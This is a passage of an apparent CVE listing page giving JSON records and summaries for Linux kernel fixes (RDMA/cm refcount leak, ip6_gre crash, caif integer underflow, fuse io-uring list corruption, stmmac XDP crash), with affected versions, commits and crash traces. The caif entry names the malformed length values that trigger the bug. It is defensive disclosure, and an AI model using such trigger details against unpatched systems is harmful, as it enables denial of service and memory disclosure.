"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.11.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:47.115Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d5ce588a9552878859a4d44b70b724216c188a5f"
},
{
"url": "https://git.kernel.org/stable/c/abf38398724ecc888f62c678d288da40d11878af"
},
{
"url": "https://git.kernel.org/stable/c/ab668a58c4a2ccb6d54add7a76f2f955d15d0196"
},
{
"url": "https://git.kernel.org/stable/c/c0acdee513239e1d6e1b490f56be0e6837dfd162"
},
{
"url": "https://git.kernel.org/stable/c/5cb34bb5fd726491b809efbeb5cfd63ae5bf9cf3"
},
{
"url": "https://git.kernel.org/stable/c/3ba6d01c4b3c584264dc733c6a2ecc5bbc8e0bb5"
},
{
"url": "https://git.kernel.org/stable/c/57f3cb6c84159d12ba343574df2115fb18dd83ca"
}
],
"title": "RDMA/cm: Fix leaking the multicast GID table reference",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71084",
"datePublished": "2026-01-13T15:34:47.665Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-19T12:19:47.115Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71098 (GCVE-0-2025-71098)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
ip6_gre: make ip6gre_header() robust
Summary
In the Linux kernel, the following vulnerability has been resolved:
ip6_gre: make ip6gre_header() robust
Over the years, syzbot found many ways to crash the kernel
in ip6gre_header() [1].
This involves team or bonding drivers ability to dynamically
change their dev->needed_headroom and/or dev->hard_header_len
In this particular crash mld_newpack() allocated an skb
with a too small reserve/headroom, and by the time mld_sendpack()
was called, syzbot managed to attach an ip6gre device.
[1]
skbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0
------------[ cut here ]------------
kernel BUG at net/core/skbuff.c:213 !
<TASK>
skb_under_panic net/core/skbuff.c:223 [inline]
skb_push+0xc3/0xe0 net/core/skbuff.c:2641
ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371
dev_hard_header include/linux/netdevice.h:3436 [inline]
neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618
neigh_output include/net/neighbour.h:556 [inline]
ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136
__ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]
ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220
NF_HOOK_COND include/linux/netfilter.h:307 [inline]
ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247
NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318
mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855
mld_send_cr net/ipv6/mcast.c:2154 [inline]
mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
c12b395a46646bab69089ce7016ac78177f6001f , < 17e7386234f740f3e7d5e58a47b5847ea34c3bc2
(git)
Affected: c12b395a46646bab69089ce7016ac78177f6001f , < 41a1a3140aff295dee8063906f70a514548105e8 (git) Affected: c12b395a46646bab69089ce7016ac78177f6001f , < adee129db814474f2f81207bd182bf343832a52e (git) Affected: c12b395a46646bab69089ce7016ac78177f6001f , < 1717357007db150c2d703f13f5695460e960f26c (git) Affected: c12b395a46646bab69089ce7016ac78177f6001f , < 5fe210533e3459197eabfdbf97327dacbdc04d60 (git) Affected: c12b395a46646bab69089ce7016ac78177f6001f , < 91a2b25be07ce1a7549ceebbe82017551d2eec92 (git) Affected: c12b395a46646bab69089ce7016ac78177f6001f , < db5b4e39c4e63700c68a7e65fc4e1f1375273476 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/ip6_gre.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "17e7386234f740f3e7d5e58a47b5847ea34c3bc2",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
},
{
"lessThan": "41a1a3140aff295dee8063906f70a514548105e8",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
},
{
"lessThan": "adee129db814474f2f81207bd182bf343832a52e",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
},
{
"lessThan": "1717357007db150c2d703f13f5695460e960f26c",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
},
{
"lessThan": "5fe210533e3459197eabfdbf97327dacbdc04d60",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
},
{
"lessThan": "91a2b25be07ce1a7549ceebbe82017551d2eec92",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
},
{
"lessThan": "db5b4e39c4e63700c68a7e65fc4e1f1375273476",
"status": "affected",
"version": "c12b395a46646bab69089ce7016ac78177f6001f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/ip6_gre.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_gre: make ip6gre_header() robust\n\nOver the years, syzbot found many ways to crash the kernel\nin ip6gre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ip6gre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0\n------------[ cut here ]------------\n kernel BUG at net/core/skbuff.c:213 !\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n neigh_output include/net/neighbour.h:556 [inline]\n ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136\n __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]\n ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:59.609Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/17e7386234f740f3e7d5e58a47b5847ea34c3bc2"
},
{
"url": "https://git.kernel.org/stable/c/41a1a3140aff295dee8063906f70a514548105e8"
},
{
"url": "https://git.kernel.org/stable/c/adee129db814474f2f81207bd182bf343832a52e"
},
{
"url": "https://git.kernel.org/stable/c/1717357007db150c2d703f13f5695460e960f26c"
},
{
"url": "https://git.kernel.org/stable/c/5fe210533e3459197eabfdbf97327dacbdc04d60"
},
{
"url": "https://git.kernel.org/stable/c/91a2b25be07ce1a7549ceebbe82017551d2eec92"
},
{
"url": "https://git.kernel.org/stable/c/db5b4e39c4e63700c68a7e65fc4e1f1375273476"
}
],
"title": "ip6_gre: make ip6gre_header() robust",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71098",
"datePublished": "2026-01-13T15:34:57.536Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-19T12:19:59.609Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68799 (GCVE-0-2025-68799)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
caif: fix integer underflow in cffrml_receive()
Summary
In the Linux kernel, the following vulnerability has been resolved:
caif: fix integer underflow in cffrml_receive()
The cffrml_receive() function extracts a length field from the packet
header and, when FCS is disabled, subtracts 2 from this length without
validating that len >= 2.
If an attacker sends a malicious packet with a length field of 0 or 1
to an interface with FCS disabled, the subtraction causes an integer
underflow.
This can lead to memory exhaustion and kernel instability, potential
information disclosure if padding contains uninitialized kernel memory.
Fix this by validating that len >= 2 before performing the subtraction.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < f407f1c9f45bbf5c99fd80b3f3f4a94fdbe35691
(git)
Affected: b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < c54091eec6fed19e94182aa05dd6846600a642f7 (git) Affected: b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < 785c7be6361630070790f6235b696da156ac71b3 (git) Affected: b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < f818cd472565f8b0c2c409b040e0121c5cf8592c (git) Affected: b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < 4ec29714aa4e0601ea29d2f02b461fc0ac92c2c3 (git) Affected: b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < 21fdcc00656a60af3c7aae2dea8dd96abd35519c (git) Affected: b482cd2053e3b90a7b33a78c63cdb6badf2ec383 , < 8a11ff0948b5ad09b71896b7ccc850625f9878d1 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/caif/cffrml.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f407f1c9f45bbf5c99fd80b3f3f4a94fdbe35691",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
},
{
"lessThan": "c54091eec6fed19e94182aa05dd6846600a642f7",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
},
{
"lessThan": "785c7be6361630070790f6235b696da156ac71b3",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
},
{
"lessThan": "f818cd472565f8b0c2c409b040e0121c5cf8592c",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
},
{
"lessThan": "4ec29714aa4e0601ea29d2f02b461fc0ac92c2c3",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
},
{
"lessThan": "21fdcc00656a60af3c7aae2dea8dd96abd35519c",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
},
{
"lessThan": "8a11ff0948b5ad09b71896b7ccc850625f9878d1",
"status": "affected",
"version": "b482cd2053e3b90a7b33a78c63cdb6badf2ec383",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/caif/cffrml.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.35"
},
{
"lessThan": "2.6.35",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "2.6.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncaif: fix integer underflow in cffrml_receive()\n\nThe cffrml_receive() function extracts a length field from the packet\nheader and, when FCS is disabled, subtracts 2 from this length without\nvalidating that len \u003e= 2.\n\nIf an attacker sends a malicious packet with a length field of 0 or 1\nto an interface with FCS disabled, the subtraction causes an integer\nunderflow.\n\nThis can lead to memory exhaustion and kernel instability, potential\ninformation disclosure if padding contains uninitialized kernel memory.\n\nFix this by validating that len \u003e= 2 before performing the subtraction."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:10.722Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f407f1c9f45bbf5c99fd80b3f3f4a94fdbe35691"
},
{
"url": "https://git.kernel.org/stable/c/c54091eec6fed19e94182aa05dd6846600a642f7"
},
{
"url": "https://git.kernel.org/stable/c/785c7be6361630070790f6235b696da156ac71b3"
},
{
"url": "https://git.kernel.org/stable/c/f818cd472565f8b0c2c409b040e0121c5cf8592c"
},
{
"url": "https://git.kernel.org/stable/c/4ec29714aa4e0601ea29d2f02b461fc0ac92c2c3"
},
{
"url": "https://git.kernel.org/stable/c/21fdcc00656a60af3c7aae2dea8dd96abd35519c"
},
{
"url": "https://git.kernel.org/stable/c/8a11ff0948b5ad09b71896b7ccc850625f9878d1"
}
],
"title": "caif: fix integer underflow in cffrml_receive()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68799",
"datePublished": "2026-01-13T15:29:09.012Z",
"dateReserved": "2025-12-24T10:30:51.042Z",
"dateUpdated": "2026-01-19T12:19:10.722Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68805 (GCVE-0-2025-68805)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
VLAI?
EPSS
Title
fuse: fix io-uring list corruption for terminated non-committed requests
Summary
In the Linux kernel, the following vulnerability has been resolved:
fuse: fix io-uring list corruption for terminated non-committed requests
When a request is terminated before it has been committed, the request
is not removed from the queue's list. This leaves a dangling list entry
that leads to list corruption and use-after-free issues.
Remove the request from the queue's list for terminated non-committed
requests.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/fuse/dev_uring.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a6d1f1ace16d0e777a85f84267160052d3499b6e",
"status": "affected",
"version": "c090c8abae4b6b77a1bee116aa6c385456ebef96",
"versionType": "git"
},
{
"lessThan": "95c39eef7c2b666026c69ab5b30471da94ea2874",
"status": "affected",
"version": "c090c8abae4b6b77a1bee116aa6c385456ebef96",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/fuse/dev_uring.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.14"
},
{
"lessThan": "6.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: fix io-uring list corruption for terminated non-committed requests\n\nWhen a request is terminated before it has been committed, the request\nis not removed from the queue\u0027s list. This leaves a dangling list entry\nthat leads to list corruption and use-after-free issues.\n\nRemove the request from the queue\u0027s list for terminated non-committed\nrequests."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:13.119Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a6d1f1ace16d0e777a85f84267160052d3499b6e"
},
{
"url": "https://git.kernel.org/stable/c/95c39eef7c2b666026c69ab5b30471da94ea2874"
}
],
"title": "fuse: fix io-uring list corruption for terminated non-committed requests",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68805",
"datePublished": "2026-01-13T15:29:13.119Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-13T15:29:13.119Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71095 (GCVE-0-2025-71095)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
VLAI?
EPSS
Title
net: stmmac: fix the crash issue for zero copy XDP_TX action
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: fix the crash issue for zero copy XDP_TX action
There is a crash issue when running zero copy XDP_TX action, the crash
log is shown below.
[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000
[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP
[ 216.301694] Call trace:
[ 216.304130] dcache_clean_poc+0x20/0x38 (P)
[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0
[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400
[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368
[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00
[ 216.326576] __napi_poll+0x40/0x218
[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt
For XDP_TX action, the xdp_buff is converted to xdp_frame by
xdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame
depends on the memory type of the xdp_buff. For page pool based xdp_buff
it produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy
XSK pool based xdp_buff it produces xdp_frame with memory type
MEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the
memory type and always uses the page pool type, this leads to invalid
mappings and causes the crash. Therefore, check the xdp_buff memory type
in stmmac_xdp_xmit_back() to fix this issue.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
bba2556efad66e7eaa56fece13f7708caa1187f8 , < 3f7823219407f2f18044c2b72366a48810c5c821
(git)
Affected: bba2556efad66e7eaa56fece13f7708caa1187f8 , < 4d0ceb7677e1c4616afb96abb4518f70b65abb0d (git) Affected: bba2556efad66e7eaa56fece13f7708caa1187f8 , < 45ee0462b88396a0bd1df1991f801c89994ea72b (git) Affected: bba2556efad66e7eaa56fece13f7708caa1187f8 , < 5e5988736a95b1de7f91b10ac2575454b70e4897 (git) Affected: bba2556efad66e7eaa56fece13f7708caa1187f8 , < a48e232210009be50591fdea8ba7c07b0f566a13 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/stmicro/stmmac/stmmac_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3f7823219407f2f18044c2b72366a48810c5c821",
"status": "affected",
"version": "bba2556efad66e7eaa56fece13f7708caa1187f8",
"versionType": "git"
},
{
"lessThan": "4d0ceb7677e1c4616afb96abb4518f70b65abb0d",
"status": "affected",
"version": "bba2556efad66e7eaa56fece13f7708caa1187f8",
"versionType": "git"
},
{
"lessThan": "45ee0462b88396a0bd1df1991f801c89994ea72b",
"status": "affected",
"version": "bba2556efad66e7eaa56fece13f7708caa1187f8",
"versionType": "git"
},
{
"lessThan": "5e5988736a95b1de7f91b10ac2575454b70e4897",
"status": "affected",
"version": "bba2556efad66e7eaa56fece13f7708caa1187f8",
"versionType": "git"
},
{
"lessThan": "a48e232210009be50591fdea8ba7c07b0f566a13",
"status": "affected",
"version": "bba2556efad66e7eaa56fece13f7708caa1187f8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/stmicro/stmmac/stmmac_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
